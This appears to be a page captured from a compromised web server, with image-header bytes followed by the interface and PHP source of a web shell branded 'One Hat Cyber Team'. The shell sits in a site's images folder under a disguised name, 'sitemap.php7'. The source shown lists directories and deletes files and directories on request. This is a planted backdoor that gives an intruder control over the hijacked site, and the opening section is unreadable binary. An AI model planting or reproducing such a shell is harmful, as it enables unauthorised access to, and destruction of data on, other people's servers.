JFIF  H H C     %# , #&')*)-0-(0%()(  P P      5    !1AQq "#2Bar R Sc  ? R X o k , e k X 9["&Q }Nq' {u\ 6hc i r _ n[t lU ;8 Ax r { f Q 岳 /f 8 T D'e W ^ YŞ  }h 7 ` Կ ֑ w.gVtq> 5   O y .>%X U]3 \   ${ أh ~k Բ o Fq # y 0 & ; -W * %K m'o Yt  L  Q TS1 % `y= + b dmi HC T_# | P 㬈v;?E U " W< ms MmL G1 9  ' ' % akJo]Qcr  խ O$ ;:V > _Dn s m۸U # ҝ  ܾpe.qw3 / * a# =\.!N s l x Ԗjz Z ! >! Ɵs E< 9 N9m / E & y ? yY$a p - R 5 6 XOk$>D 켎 T RUT < > h  < 9 D } ?f8 $ EYki/O 28  }# "( 9 <  x G Ԑ YD 2  DL Default page
One Hat Cyber Team
  • Dir : ~/var/www/omnimart_live/assets/images/
  • Edit File: 1716484439sitemap.php7

    '; } echo ''; }else{ echo '
    '; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Directory Deleted
    '; }else{ echo 'Failed
    '; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'File Deleted
    '; }else{ echo 'Failed
    '; } } } echo '
    '; $scandir = scandir($path); echo '
    '; foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo ''; } echo ''; foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ''; } echo '
    Name
    Size
    Permission
    Modify
    '.$dir.'
    --
    '; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo ''; echo '
    '.$file.'
    '.$size.'
    '; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo ''; echo '
    '; } echo '

    Not found
    '; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>